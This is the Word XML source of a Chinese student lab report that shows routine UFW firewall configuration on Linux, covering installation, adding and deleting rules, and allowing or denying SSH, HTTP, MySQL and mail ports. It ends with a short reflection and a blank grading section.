          <w:p w14:paraId="2E5DB2BA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中安装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UFW</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B9E583F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7B28FD6" wp14:editId="1844F297">
                  <wp:extent cx="4384040" cy="2906395"/>
                  <wp:effectExtent l="0" t="0" r="6985" b="8255"/>
                  <wp:docPr id="38" name="图片 38" descr="屏幕快照 2018-11-09 下午6.04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屏幕快照 2018-11-09 下午6.04.3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04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C4396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检查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UFW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状态和规则</w:t>
            </w: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81B54D0" wp14:editId="3B916DC1">
                  <wp:extent cx="5122545" cy="3438525"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="0"/>
                  <wp:docPr id="39" name="图片 39" descr="屏幕快照 2018-11-09 下午6.04.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屏幕快照 2018-11-09 下午6.04.50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9B9CB" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="003145A4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</w:p>
          <w:p w14:paraId="6D497497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52C55CF" wp14:editId="20E4D818">
                  <wp:extent cx="5120005" cy="1150620"/>
                  <wp:effectExtent l="0" t="0" r="4445" b="1905"/>
                  <wp:docPr id="40" name="图片 40" descr="屏幕快照 2018-11-09 下午6.05.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屏幕快照 2018-11-09 下午6.05.0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AA883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添加规则</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51EF738B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642C7CB" wp14:editId="4AF77DA1">
                  <wp:extent cx="5118100" cy="2727325"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
                  <wp:docPr id="41" name="图片 41" descr="屏幕快照 2018-11-09 下午6.05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屏幕快照 2018-11-09 下午6.05.5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0800C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39B5CE3" wp14:editId="4A472A4F">
                  <wp:extent cx="5118100" cy="1696720"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="8255"/>
                  <wp:docPr id="42" name="图片 42" descr="屏幕快照 2018-11-09 下午6.09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屏幕快照 2018-11-09 下午6.09.53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D436B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使用三种方式删除规则（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http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）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F0051C3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272EFB3B" wp14:editId="5068DACD">
                  <wp:extent cx="5118100" cy="6362065"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="635"/>
                  <wp:docPr id="43" name="图片 43" descr="屏幕快照 2018-11-09 下午6.11.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屏幕快照 2018-11-09 下午6.11.3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636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8346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19ED88A" wp14:editId="25E61FD1">
                  <wp:extent cx="5121910" cy="6213475"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
                  <wp:docPr id="44" name="图片 44" descr="屏幕快照 2018-11-09 下午6.13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屏幕快照 2018-11-09 下午6.13.4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621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201A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085F6E2B" wp14:editId="501227E9">
                  <wp:extent cx="5121275" cy="5894070"/>
                  <wp:effectExtent l="0" t="0" r="3175" b="1905"/>
                  <wp:docPr id="45" name="图片 45" descr="屏幕快照 2018-11-09 下午6.14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屏幕快照 2018-11-09 下午6.14.2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589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71D3E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规则重置</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2829B3B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391E9A3" wp14:editId="6FBD03CE">
                  <wp:extent cx="5116830" cy="1555750"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="6350"/>
                  <wp:docPr id="46" name="图片 46" descr="屏幕快照 2018-11-09 下午6.15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屏幕快照 2018-11-09 下午6.15.3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0EF76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禁用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ufw</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A4F7C99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4147DDC3" wp14:editId="7D135947">
                  <wp:extent cx="5121910" cy="467360"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
                  <wp:docPr id="47" name="图片 47" descr="屏幕快照 2018-11-09 下午6.16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屏幕快照 2018-11-09 下午6.16.4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46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BE7A8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Block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an IP Address</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74A2C4F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lastRenderedPageBreak/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ufw deny from ip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地址</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="236BF727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6A54F805" wp14:editId="58BBC223">
                  <wp:extent cx="5123815" cy="377190"/>
                  <wp:effectExtent l="0" t="0" r="635" b="3810"/>
                  <wp:docPr id="48" name="图片 48" descr="屏幕快照 2018-11-09 下午6.27.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屏幕快照 2018-11-09 下午6.27.5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37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55387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3613AF41" wp14:editId="2C3711BA">
                  <wp:extent cx="5121910" cy="924560"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
                  <wp:docPr id="49" name="图片 49" descr="屏幕快照 2018-11-09 下午6.27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屏幕快照 2018-11-09 下午6.27.4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26360" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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Block Connections to a Network Interface</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67FAFAC4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ufw deny in on eth0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22732771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57AFE07D" wp14:editId="11440609">
                  <wp:extent cx="3217545" cy="525780"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="7620"/>
                  <wp:docPr id="53" name="图片 53" descr="屏幕快照 2018-11-09 下午8.06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屏幕快照 2018-11-09 下午8.06.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545" cy="52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CF11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9.Allow SSH</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="097AE84A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ufw allow ssh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B2E10EF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79A84CF3" wp14:editId="489D03A2">
                  <wp:extent cx="4508500" cy="1482725"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="3175"/>
                  <wp:docPr id="50" name="图片 50" descr="屏幕快照 2018-11-09 下午7.53.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屏幕快照 2018-11-09 下午7.53.5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500" cy="148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C878D" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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 xml:space="preserve">Allow Incoming SSH from Specific IP Address or Subnet </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FF90730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输入：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F95838A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ufw allow from 192.168.56.104 to any port 22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允许特定</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25E453C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 xml:space="preserve">ufw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allow from 192.168.56.0/24 to any port 22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允许子网</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="436F8CF4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4AA13358" wp14:editId="253B9A7A">
                  <wp:extent cx="5117465" cy="313690"/>
                  <wp:effectExtent l="0" t="0" r="6985" b="635"/>
                  <wp:docPr id="54" name="图片 54" descr="屏幕快照 2018-11-09 下午8.08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屏幕快照 2018-11-09 下午8.08.3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1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F504C" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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Allow All Incoming HTTP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14383D6B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ufw allow in http</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C98E220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12.Allow All Incoming HTTPS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2027BE91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ufw allow in https</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FC68B75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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="7AA1F62F" wp14:editId="326E6E4C">
                  <wp:extent cx="5118100" cy="2793365"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="6985"/>
                  <wp:docPr id="51" name="图片 51" descr="屏幕快照 2018-11-09 下午7.56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屏幕快照 2018-11-09 下午7.56.1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0C59E" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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Allow All Incoming HTTP and HTTPS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（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>HTTP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端口号为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>80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HTTPS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端口号为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>443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）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="400A2E7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输入：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ufw allow proto tcp from any to any port 80,443</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61A6676C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518A31F3" wp14:editId="3DAB1709">
                  <wp:extent cx="5119370" cy="2088515"/>
                  <wp:effectExtent l="0" t="0" r="5080" b="6985"/>
                  <wp:docPr id="55" name="图片 55" descr="屏幕快照 2018-11-09 下午8.12.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屏幕快照 2018-11-09 下午8.12.2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20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A774C" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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A</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>llow MySQL from Specific IP Address or Subnet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（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>MySQL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端口号为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>3306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）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="231F6904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输入：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="070C8018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 xml:space="preserve">ufw allow from 15.15.15.0 to any port 3306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允许特定</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059AD0B2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 xml:space="preserve">ufw allow from 15.15.15.0/24 to any port 3306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允许子网</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F44E414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679F935A" wp14:editId="6FE4D0CA">
                  <wp:extent cx="5117465" cy="1513840"/>
                  <wp:effectExtent l="0" t="0" r="6985" b="635"/>
                  <wp:docPr id="56" name="图片 56" descr="屏幕快照 2018-11-09 下午8.13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屏幕快照 2018-11-09 下午8.13.5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E9B93" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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Allow MySQL to Specific Network Interface</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CD314B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输入：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ufw allow in on eth0 to any port 3306</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58CF9BA8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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="382AC135" wp14:editId="5B42D06A">
                  <wp:extent cx="5123815" cy="518795"/>
                  <wp:effectExtent l="0" t="0" r="635" b="5080"/>
                  <wp:docPr id="57" name="图片 57" descr="屏幕快照 2018-11-09 下午8.16.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屏幕快照 2018-11-09 下午8.16.20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51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365A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16.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Block Outgoing SMTP Mail</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44B0A265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ufw deny out 25</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4752E2E5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2D425B42" wp14:editId="65B3CA44">
                  <wp:extent cx="4152900" cy="850900"/>
                  <wp:effectExtent l="0" t="0" r="0" b="6350"/>
                  <wp:docPr id="58" name="图片 58" descr="屏幕快照 2018-11-09 下午8.17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屏幕快照 2018-11-09 下午8.17.5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73BBD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17.Allow All Incoming SMTP, IMAP,IMAPS,POP3,POP3S9.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（端口号分别为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>25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143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993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110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995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）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="491BA59D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输入：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ufw allow proto tcp from any to any port 25,143,993,110,995</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44AD5DB6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D6383FF" wp14:editId="2DCB99B1">
                  <wp:extent cx="5123815" cy="2282825"/>
                  <wp:effectExtent l="0" t="0" r="635" b="3175"/>
                  <wp:docPr id="59" name="图片 59" descr="屏幕快照 2018-11-09 下午8.21.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屏幕快照 2018-11-09 下午8.21.4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5" cy="228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0FB9D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结论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】</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CF19079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3145A4" w14:paraId="6F4E8C98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A32E0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  <w:tr w:rsidR="003145A4" w14:paraId="1C18BEB5" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="542"/>
        </w:trPr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49F87" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A">
            <w:pPr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小结</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003145A4" w14:paraId="24934281" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="706"/>
        </w:trPr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58F639" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A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bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>通过本次实验，我</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>掌握</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>了</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>注入攻击和</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>XSS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>攻击，知道了如何</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>操作系统中配置防火墙</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>，也学会了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通过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UFW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配置防火墙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，对于网络攻击和安全防护有了更加深刻的认知。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BEAEC0E" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="003145A4">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7E6EBEF5" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="003145A4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</w:p>
          <w:p w14:paraId="79A0B02A" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="003145A4">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003145A4" w14:paraId="693C1C1D" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="345"/>
        </w:trPr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B2375" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A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指导教师评语及成绩</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003145A4" w14:paraId="4F43EB07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F71DB" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A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评语：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial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658FB8EC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14:paraId="55B611D2" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="003145A4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 w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="44D68832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14:paraId="7533B702" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00314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14:paraId="5C00C78E" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5A">
            <w:pPr>
              <w:widowControl/>
              <w:ind w:firstLine="3600"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成绩：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">           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24F467EE" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="00537F5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Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">                                               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7B9C5603" w14:textId="77777777" w:rsidR="003145A4" w:rsidRDefault="003145A4"/>
    <w:sectPr w:rsidR="003145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4CBC6A6"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="84CBC6A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4FDC6CA"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E4FDC6CA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DDD5179"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0DDD5179"/>
    <w:lvl w:ilvl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F0D11C0"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0F0D11C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2920735"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="32920735"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:ind w:left="50" w:firstLine="0"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5">
    <w:nsid w:val="72B04314"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="72B04314"/>
    <w:lvl w:ilvl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2C271E5"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="72C271E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561C5BC"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="7561C5BC"/>
    <w:lvl w:ilvl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78F1A24E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="78F1A24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8"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="6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3145A4"/>
    <w:rsid w:val="00504E6E"/>
    <w:rsid w:val="00537F5A"/>
    <w:rsid w:val="0099403F"/>
    <w:rsid w:val="00C2346F"/>
    <w:rsid w:val="00C66B96"/>
    <w:rsid w:val="123D6F16"/>
    <w:rsid w:val="23A11050"/>
    <w:rsid w:val="2AA953E6"/>
    <w:rsid w:val="36861458"/>
    <w:rsid w:val="3886483B"/>
    <w:rsid w:val="639F44D4"/>
    <w:rsid w:val="643E0099"/>
    <w:rsid w:val="72FF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8DB6F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眉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Pr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="标题 1字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:qFormat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fontTable" Target="fontTable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571</Words>
  <Characters>3259</Characters>
  <Application>Microsoft Macintosh Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>27</Lines>
  <Paragraphs>7</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>3823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Microsoft Office 用户</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-09-20T07:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-04-02T14:50:00Z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